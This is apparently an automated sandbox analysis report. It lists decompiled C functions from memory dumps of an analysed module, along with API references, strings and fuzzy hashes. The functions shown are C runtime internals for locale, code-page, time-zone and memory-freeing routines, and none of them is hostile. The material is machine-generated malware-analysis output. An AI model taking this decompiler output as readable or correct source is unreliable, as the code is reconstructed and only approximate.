Part of subcall function 6D4CD5FF: SetLastError.KERNEL32(00000000,6D542B60,0000000C,6D48402A,00000000,00000001,?,`kTm,00000020,6D48159B,43D0C569), ref: 6D4CD677
Part of subcall function 6D4CD5FF: _abort.LIBCMT ref: 6D4CD67D

IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6D4CE042,?,?,?,?,6D4CDA1E,?,00000004), ref: 6D4DDE78
_wcschr.LIBVCRUNTIME ref: 6D4DDF08
_wcschr.LIBVCRUNTIME ref: 6D4DDF16
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,BLm,00000000,?), ref: 6D4DDFB9

Strings

)OmU, xrefs: 6D4DDDD4
BLm, xrefs: 6D4DDE8F, 6D4DDED7, 6D4DDF7F
t!OmE, xrefs: 6D4DDE09

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
String ID: )OmU$BLm$t!OmE
API String ID: 4212172061-2756785005
Opcode ID: e52c2f99e368c53a6bc2677ca8953e182ad2cb8a6903d09800f6c02570e081b6
Instruction ID: d1847a60c6be48611069323678302f6c1a8618bea2940531ff807033f30b250a
Opcode Fuzzy Hash: e52c2f99e368c53a6bc2677ca8953e182ad2cb8a6903d09800f6c02570e081b6
Instruction Fuzzy Hash: C961F531604306AAEB54EF74CC91FB673A8EF85714F11446EEA18DB280FB74ED458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE518, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E6D4DE518(void* __ecx, signed int _a4, char _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_push(__ecx);
				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					_t11 =  &_a8; // 0x6d4de837
					if(GetLocaleInfoW( *( *_t11 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = 0x6d4f2f08;
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = 0x6d4f2f10;
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E6D4CBF09(_t23, _t23);
									goto L25;
								}
								_t7 =  &_a8; // 0x6d4de837
								if(GetLocaleInfoW( *( *_t7 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6D4DE837,?,00000000), ref: 6D4DE5B1
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6D4DE837,?,00000000), ref: 6D4DE5DA
GetACP.KERNEL32(?,?,6D4DE837,?,00000000), ref: 6D4DE5EF

Strings

7Mm, xrefs: 6D4DE5CF, 6D4DE5A6
ACP, xrefs: 6D4DE536
OCP, xrefs: 6D4DE56C

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InfoLocale
String ID: 7Mm$ACP$OCP
API String ID: 2299586839-141736179
Opcode ID: 6bea2a14342b2a794d73dea8018a5d0801cd727a4be483fb57222a5feb8d4c2c
Instruction ID: 92873ef5ecc39df3f6a13fbd94e680efc550b98a484e4095e32836cd61de1e8e
Opcode Fuzzy Hash: 6bea2a14342b2a794d73dea8018a5d0801cd727a4be483fb57222a5feb8d4c2c
Instruction Fuzzy Hash: 1321E222604102EAE791CF98C9B0E97F7B6AF45BA0B628439E989C7304F732DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DBF64, Relevance: 19.6, APIs: 13, Instructions: 114
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4DBF64(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _t25;
				intOrPtr* _t26;
				intOrPtr _t28;
				intOrPtr* _t29;
				intOrPtr* _t31;
				intOrPtr* _t45;
				intOrPtr* _t46;
				intOrPtr* _t47;
				intOrPtr* _t55;
				intOrPtr* _t70;
				intOrPtr _t74;

				_t74 = _a4;
				_t25 =  *((intOrPtr*)(_t74 + 0x88));
				if(_t25 != 0 && _t25 != 0x6d5450b8) {
					_t45 =  *((intOrPtr*)(_t74 + 0x7c));
					if(_t45 != 0 &&  *_t45 == 0) {
						_t46 =  *((intOrPtr*)(_t74 + 0x84));
						if(_t46 != 0 &&  *_t46 == 0) {
							E6D4CCBD3(_t46);
							E6D4DC7CF( *((intOrPtr*)(_t74 + 0x88)));
						}
						_t47 =  *((intOrPtr*)(_t74 + 0x80));
						if(_t47 != 0 &&  *_t47 == 0) {
							E6D4CCBD3(_t47);
							E6D4DCCC3( *((intOrPtr*)(_t74 + 0x88)));
						}
						E6D4CCBD3( *((intOrPtr*)(_t74 + 0x7c)));
						E6D4CCBD3( *((intOrPtr*)(_t74 + 0x88)));
					}
				}
				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
				if(_t26 != 0 &&  *_t26 == 0) {
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
					E6D4CCBD3( *((intOrPtr*)(_t74 + 0x8c)));
				}
				E6D4DC0D7( *((intOrPtr*)(_t74 + 0x9c)));
				_t28 = 6;
				_t16 = _t74 + 0xa0; // 0xa0
				_t55 = _t16;
				_v8 = _t28;
				_t18 = _t74 + 0x28; // 0x28
				_t70 = _t18;
				do {
					if( *((intOrPtr*)(_t70 - 8)) != 0x6d5452b0) {
						_t31 =  *_t70;
						if(_t31 != 0 &&  *_t31 == 0) {
							E6D4CCBD3(_t31);
							E6D4CCBD3( *_t55);
						}
						_t28 = _v8;
					}
					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
						_t29 =  *((intOrPtr*)(_t70 - 4));
						if(_t29 != 0 &&  *_t29 == 0) {
							E6D4CCBD3(_t29);
						}
						_t28 = _v8;
					}
					_t55 = _t55 + 4;
					_t70 = _t70 + 0x10;
					_t28 = _t28 - 1;
					_v8 = _t28;
				} while (_t28 != 0);
				return E6D4CCBD3(_t74);
			}

APIs

___free_lconv_mon.LIBCMT ref: 6D4DBFA8

Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC7EC
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC7FE
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC810
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC822
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC834
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC846
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC858
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC86A
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC87C
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC88E
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8A0
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8B2
Part of subcall function 6D4DC7CF: _free.LIBCMT ref: 6D4DC8C4

_free.LIBCMT ref: 6D4DBF9D

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4DBFBF
_free.LIBCMT ref: 6D4DBFD4
_free.LIBCMT ref: 6D4DBFDF
_free.LIBCMT ref: 6D4DC001
_free.LIBCMT ref: 6D4DC014
_free.LIBCMT ref: 6D4DC022
_free.LIBCMT ref: 6D4DC02D
_free.LIBCMT ref: 6D4DC065
_free.LIBCMT ref: 6D4DC06C
_free.LIBCMT ref: 6D4DC089
_free.LIBCMT ref: 6D4DC0A1

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: e47e6515e86acb3e28363ad1a88701adc73fef58333804502ab4521a721a2791
Instruction ID: e1d1b62074adb9544364dc114549019808776951e1401d154c963c8f8dbf825e
Opcode Fuzzy Hash: e47e6515e86acb3e28363ad1a88701adc73fef58333804502ab4521a721a2791
Instruction Fuzzy Hash: 47315C316083069FEB619BB8E854F6A73FAEF04314F21481EE168D7695EF31AD50CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D877C, Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370
timeCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E6D4D877C(void* __ebx, void* __edi, void* __eflags, signed int _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				int _v20;
				int _v24;
				void* _v52;
				int _v56;
				int _v60;
				signed int _v100;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v356;
				char _v360;
				void* __esi;
				void* __ebp;
				signed int _t65;
				signed int _t72;
				signed int _t74;
				signed int _t78;
				signed int _t85;
				signed int _t89;
				signed int _t91;
				long _t93;
				signed int* _t96;
				signed int _t99;
				signed int _t102;
				signed int _t106;
				void* _t113;
				signed int _t116;
				void* _t117;
				void* _t119;
				void* _t120;
				void* _t122;
				signed int _t124;
				signed int _t125;
				signed int* _t128;
				signed int _t129;
				void* _t132;
				void* _t134;
				signed int _t135;
				signed int _t137;
				void* _t140;
				intOrPtr _t141;
				void* _t143;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t158;
				signed int _t161;
				intOrPtr* _t166;
				intOrPtr _t167;
				signed int _t168;
				intOrPtr* _t169;
				void* _t170;
				void* _t171;
				signed int _t172;
				int _t176;
				signed int _t178;
				char** _t179;
				signed int _t183;
				signed int _t184;
				void* _t191;
				signed int _t192;
				void* _t193;
				signed int _t194;

				_t171 = __edi;
				_t65 = E6D4D822B();
				_v8 = _v8 & 0x00000000;
				_t137 = _t65;
				_v16 = _v16 & 0x00000000;
				_v12 = _t137;
				if(E6D4D8289( &_v8) != 0 || E6D4D8231( &_v16) != 0) {
					L46:
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					E6D4C2188();
					asm("int3");
					_t191 = _t193;
					_t194 = _t193 - 0x10;
					_push(_t137);
					_t179 = E6D4D822B();
					_t32 =  &_v52; // 0x6d4f2130
					_v52 = 0;
					_v56 = 0;
					_v60 = 0;
					_t72 = E6D4D8289(_t32);
					_t143 = _t178;
					__eflags = _t72;
					if(_t72 != 0) {
						L66:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E6D4C2188();
						asm("int3");
						_push(_t191);
						_t192 = _t194;
						_t74 =  *0x6d54506c; // 0xff2bc58a
						_v100 = _t74 ^ _t192;
						 *0x6d545384 =  *0x6d545384 | 0xffffffff;
						 *0x6d545378 =  *0x6d545378 | 0xffffffff;
						_push(0);
						_push(_t179);
						_push(_t171);
						_t172 = 0;
						 *0x6d547a10 = 0;
						_t78 = E6D4D1216(0x6d4f2130, _t167, 0, __eflags,  &_v360,  &_v356, 0x100, 0x6d4f2130);
						__eflags = _t78;
						if(_t78 != 0) {
							__eflags = _t78 - 0x22;
							if(_t78 == 0x22) {
								_t184 = E6D4CF26D(_t143, _v276);
								__eflags = _t184;
								if(__eflags != 0) {
									_t85 = E6D4D1216(0x6d4f2130, _t167, 0, __eflags,  &_v280, _t184, _v276, 0x6d4f2130);
									__eflags = _t85;
									if(_t85 == 0) {
										E6D4CCBD3(0);
										_t172 = _t184;
									} else {
										_push(_t184);
										goto L73;
									}
								} else {
									_push(0);
									L73:
									E6D4CCBD3();
								}
							}
						} else {
							_t172 =  &_v272;
						}
						asm("sbb esi, esi");
						_t183 =  ~(_t172 -  &_v272) & _t172;
						__eflags = _t172;
						if(_t172 == 0) {
							L81:
							L47();
						} else {
							__eflags =  *_t172;
							if(__eflags == 0) {
								goto L81;
							} else {
								_push(_t172);
								E6D4D877C(0x6d4f2130, _t172, __eflags);
							}
						}
						E6D4CCBD3(_t183);
						__eflags = _v16 ^ _t192;
						return E6D49F8A5(_v16 ^ _t192, _t167, _t183);
					} else {
						_t89 = E6D4D8231( &_v16);
						_pop(_t143);
						__eflags = _t89;
						if(_t89 != 0) {
							goto L66;
						} else {
							_t91 = E6D4D825D( &_v20);
							_pop(_t143);
							__eflags = _t91;
							if(_t91 != 0) {
								goto L66;
							} else {
								E6D4CCBD3( *0x6d547a08);
								 *0x6d547a08 = 0;
								 *_t194 = 0x6d547a18;
								_t93 = GetTimeZoneInformation(??);
								__eflags = _t93 - 0xffffffff;
								if(_t93 != 0xffffffff) {
									_t150 =  *0x6d547a18 * 0x3c;
									_t168 =  *0x6d547a6c; // 0x0
									_push(_t171);
									 *0x6d547a10 = 1;
									_v12 = _t150;
									__eflags =  *0x6d547a5e; // 0x0
									if(__eflags != 0) {
										_t151 = _t150 + _t168 * 0x3c;
										__eflags = _t151;
										_v12 = _t151;
									}
									__eflags =  *0x6d547ab2; // 0x0
									if(__eflags == 0) {
										L56:
										_v16 = 0;
										_v20 = 0;
									} else {
										_t106 =  *0x6d547ac0; // 0x0
										__eflags = _t106;
										if(_t106 == 0) {
											goto L56;
										} else {
											_v16 = 1;
											_v20 = (_t106 - _t168) * 0x3c;
										}
									}
									_t176 = E6D4C3CD0(0, _t168);
									_t99 = WideCharToMultiByte(_t176, 0, 0x6d547a1c, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
									__eflags = _t99;
									if(_t99 == 0) {
										L60:
										 *( *_t179) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L60;
										} else {
											( *_t179)[0x3f] = 0;
										}
									}
									_t102 = WideCharToMultiByte(_t176, 0, 0x6d547a70, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
									__eflags = _t102;
									if(_t102 == 0) {
										L64:
										 *(_t179[1]) = 0;
									} else {
										__eflags = _v24;
										if(_v24 != 0) {
											goto L64;
										} else {
											_t179[1][0x3f] = 0;
										}
									}
								}
								 *(E6D4D8225()) = _v12;
								 *((intOrPtr*)(E6D4D8219())) = _v16;
								_t96 = E6D4D821F();
								 *_t96 = _v20;
								return _t96;
							}
						}
					}
				} else {
					_t169 =  *0x6d547a08; // 0x0
					_t178 = _a4;
					if(_t169 == 0) {
						L12:
						E6D4CCBD3(_t169);
						_t154 = _t178;
						_t12 = _t154 + 1; // 0x6d4d8b6d
						_t170 = _t12;
						do {
							_t113 =  *_t154;
							_t154 = _t154 + 1;
						} while (_t113 != 0);
						_t13 = _t154 - _t170 + 1; // 0x6d4d8b6e
						 *0x6d547a08 = E6D4CF26D(_t154 - _t170, _t13);
						_t116 = E6D4CCBD3(0);
						_t167 =  *0x6d547a08; // 0x0
						if(_t167 == 0) {
							goto L45;
						} else {
							_t158 = _t178;
							_push(_t171);
							_t14 = _t158 + 1; // 0x6d4d8b6d
							_t171 = _t14;
							do {
								_t117 =  *_t158;
								_t158 = _t158 + 1;
							} while (_t117 != 0);
							_t15 = _t158 - _t171 + 1; // 0x6d4d8b6e
							_t119 = E6D4CAB60(_t167, _t15, _t178);
							_t193 = _t193 + 0xc;
							if(_t119 == 0) {
								_t171 = 3;
								_push(_t171);
								_t120 = E6D4E3B33(_t159,  *_t137, 0x40, _t178);
								_t193 = _t193 + 0x10;
								if(_t120 == 0) {
									while( *_t178 != 0) {
										_t178 = _t178 + 1;
										_t171 = _t171 - 1;
										if(_t171 != 0) {
											continue;
										}
										break;
									}
									_pop(_t171);
									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
									if(_t137 != 0) {
										_t178 = _t178 + 1;
									}
									_t161 = E6D4CBFB3(_t159, _t178) * 0xe10;
									_v8 = _t161;
									while(1) {
										_t122 =  *_t178;
										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
											break;
										}
										_t178 = _t178 + 1;
									}
									__eflags =  *_t178 - 0x3a;
									if( *_t178 == 0x3a) {
										_t178 = _t178 + 1;
										_t161 = _v8 + E6D4CBFB3(_t161, _t178) * 0x3c;
										_v8 = _t161;
										while(1) {
											_t132 =  *_t178;
											__eflags = _t132 - 0x30;
											if(_t132 < 0x30) {
												break;
											}
											__eflags = _t132 - 0x39;
											if(_t132 <= 0x39) {
												_t178 = _t178 + 1;
												__eflags = _t178;
												continue;
											}
											break;
										}
										__eflags =  *_t178 - 0x3a;
										if( *_t178 == 0x3a) {
											_t178 = _t178 + 1;
											_t161 = _v8 + E6D4CBFB3(_t161, _t178);
											_v8 = _t161;
											while(1) {
												_t134 =  *_t178;
												__eflags = _t134 - 0x30;
												if(_t134 < 0x30) {
													goto L38;
												}
												__eflags = _t134 - 0x39;
												if(_t134 <= 0x39) {
													_t178 = _t178 + 1;
													__eflags = _t178;
													continue;
												}
												goto L38;
											}
										}
									}
									L38:
									__eflags = _t137;
									if(_t137 != 0) {
										_v8 = _t161;
									}
									__eflags =  *_t178;
									_t124 = 0 |  *_t178 != 0x00000000;
									_v16 = _t124;
									__eflags = _t124;
									_t125 = _v12;
									if(_t124 == 0) {
										_t29 = _t125 + 4; // 0xfffffddd
										 *((char*)( *_t29)) = 0;
										L44:
										 *(E6D4D8225()) = _v8;
										_t128 = E6D4D8219();
										 *_t128 = _v16;
										return _t128;
									}
									_push(3);
									_t28 = _t125 + 4; // 0xfffffddd
									_t129 = E6D4E3B33(_t161,  *_t28, 0x40, _t178);
									_t193 = _t193 + 0x10;
									__eflags = _t129;
									if(_t129 == 0) {
										goto L44;
									}
								}
							}
							goto L46;
						}
					} else {
						_t166 = _t169;
						_t135 = _t178;
						while(1) {
							_t140 =  *_t135;
							if(_t140 !=  *_t166) {
								break;
							}
							if(_t140 == 0) {
								L8:
								_t116 = 0;
							} else {
								_t9 = _t135 + 1; // 0xdde805eb
								_t141 =  *_t9;
								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
									break;
								} else {
									_t135 = _t135 + 2;
									_t166 = _t166 + 2;
									if(_t141 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
							L10:
							if(_t116 == 0) {
								L45:
								return _t116;
							} else {
								_t137 = _v12;
								goto L12;
							}
							goto L83;
						}
						asm("sbb eax, eax");
						_t116 = _t135 | 0x00000001;
						__eflags = _t116;
						goto L10;
					}
				}
				L83:
			}

APIs

_free.LIBCMT ref: 6D4D87FE
_free.LIBCMT ref: 6D4D8822
_free.LIBCMT ref: 6D4D89A9
GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6D4F2130), ref: 6D4D89BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6D4D8A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6D547A70,000000FF,?,0000003F,00000000,?), ref: 6D4D8A60
_free.LIBCMT ref: 6D4D8B75

Strings

0!Om, xrefs: 6D4D8964, 6D4D896A
0!Om, xrefs: 6D4D8AD8

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ByteCharMultiWide$InformationTimeZone
String ID: 0!Om$0!Om
API String ID: 314583886-1120582717
Opcode ID: a02d91bcfcd1aa52cd3d16acd72fabb71efda1820a084937cc00ef2a11e4ccac
Instruction ID: 874b308c6cb711a4aee1c17743a3b777b596c311376be4b98ffdcc0b3f4aeada
Opcode Fuzzy Hash: a02d91bcfcd1aa52cd3d16acd72fabb71efda1820a084937cc00ef2a11e4ccac
Instruction Fuzzy Hash: 32C14371908246AFDB41DF698C60FBABBB9EF42314F25509EE59097341E7308E41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4CD3EF, Relevance: 15.1, APIs: 10, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6D4CD3EF(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x6d4f0c10) {
					E6D4CCBD3(_t52);
					_t26 = _a4;
				}
				E6D4CCBD3( *((intOrPtr*)(_t26 + 0x3c)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x30)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x34)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x38)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x28)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x2c)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x40)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x44)));
				E6D4CCBD3( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E6D4CD23E(5,  &_v8);
				_v8 =  &_a4;
				return E6D4CD28E(4,  &_v8);
			}

APIs

_free.LIBCMT ref: 6D4CD403

Part of subcall function 6D4CCBD3: HeapFree.KERNEL32(00000000,00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000), ref: 6D4CCBE9
Part of subcall function 6D4CCBD3: GetLastError.KERNEL32(00000000,?,6D4DCFAF,00000000,00000000,00000000,00000000,?,6D4DD2B4,00000000,00000007,00000000,?,6D4DC0FC,00000000,00000000), ref: 6D4CCBFB

_free.LIBCMT ref: 6D4CD40F
_free.LIBCMT ref: 6D4CD41A
_free.LIBCMT ref: 6D4CD425
_free.LIBCMT ref: 6D4CD430
_free.LIBCMT ref: 6D4CD43B
_free.LIBCMT ref: 6D4CD446
_free.LIBCMT ref: 6D4CD451
_free.LIBCMT ref: 6D4CD45C
_free.LIBCMT ref: 6D4CD46A

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 543e01b92c3d19d6410854883f4826c013043d61eb47dcf96ecb754274df2998
Instruction ID: 1dabfc460e9ad6684273c570cdebddbb70d841b430b7b54c9abff2d1a8e017c9
Opcode Fuzzy Hash: 543e01b92c3d19d6410854883f4826c013043d61eb47dcf96ecb754274df2998
Instruction Fuzzy Hash: BD11BC7954810CBFCB01DF94D840DDA3B76EF44254B1240A9BA084F126E775DE609BC2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A70E2, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 73
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6D4A70E2(void* __ecx, void* __edx, signed int* _a4) {
				intOrPtr _v8;
				char _v12;
				char* _t18;
				unsigned int _t23;
				char* _t26;
				intOrPtr* _t29;
				intOrPtr* _t30;
				unsigned int _t33;
				char* _t36;
				signed int* _t38;
				void* _t41;
				intOrPtr _t47;
				intOrPtr _t50;

				_t18 =  *0x6d547218; // 0x0
				_t41 =  *_t18 - 0x58;
				if(_t41 == 0) {
					 *0x6d547218 = _t18 + 1;
					_push("void");
					goto L16;
				} else {
					if(_t41 == 0) {
						 *0x6d547218 = _t18 + 1;
						_t23 =  *0x6d547220; // 0x0
						_t26 = "...";
						if(( !(_t23 >> 0x12) & 0x00000001) == 0) {
							_t26 = "<ellipsis>";
						}
						_push(_t26);
						L16:
						E6D4A5A6C(_a4);
						goto L17;
					} else {
						E6D4A6FEC(__edx,  &_v12);
						_t50 = _v8;
						if(_t50 != 0) {
							L11:
							_t29 = _a4;
							 *_t29 = _v12;
							 *((intOrPtr*)(_t29 + 4)) = _t50;
							return _t29;
						} else {
							_t30 =  *0x6d547218; // 0x0
							_t47 =  *_t30;
							if(_t47 == 0) {
								goto L11;
							} else {
								if(_t47 == 0x40) {
									 *0x6d547218 = _t30 + 1;
									goto L11;
								} else {
									if(_t47 == 0x5a) {
										 *0x6d547218 = _t30 + 1;
										_t33 =  *0x6d547220; // 0x0
										_t36 = ",...";
										if(( !(_t33 >> 0x12) & 0x00000001) == 0) {
											_t36 = ",<ellipsis>";
										}
										E6D4A5EB7( &_v12, _a4, _t36);
										L17:
										return _a4;
									} else {
										_t38 = _a4;
										_t38[1] = _t38[1] & 0x00000000;
										 *_t38 =  *_t38 & 0x00000000;
										_t38[1] = 2;
										return _t38;
									}
								}
							}
						}
					}
				}
			}

APIs

UnDecorator::getArgumentList.LIBVCRUNTIME ref: 6D4A7102

Part of subcall function 6D4A6FEC: Replicator::operator[].LIBVCRUNTIME ref: 6D4A7058
Part of subcall function 6D4A6FEC: DName::operator+=.LIBVCRUNTIME ref: 6D4A7060

DName::operator+.LIBCMT ref: 6D4A7159
DName::DName.LIBVCRUNTIME ref: 6D4A71A2

Strings

void, xrefs: 6D4A719A
..., xrefs: 6D4A7185
,..., xrefs: 6D4A7146
,<ellipsis>, xrefs: 6D4A714D, 6D4A7152
<ellipsis>, xrefs: 6D4A718C, 6D4A7191

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: eb8895d049d0116c32920d09feb8959098176babb342215634856f35f4bb7762
Instruction ID: 3cd20de1614c555013ba0167d8b3e93defab1f0af2fd4f4c0dcc1662e3dcf04c
Opcode Fuzzy Hash: eb8895d049d0116c32920d09feb8959098176babb342215634856f35f4bb7762
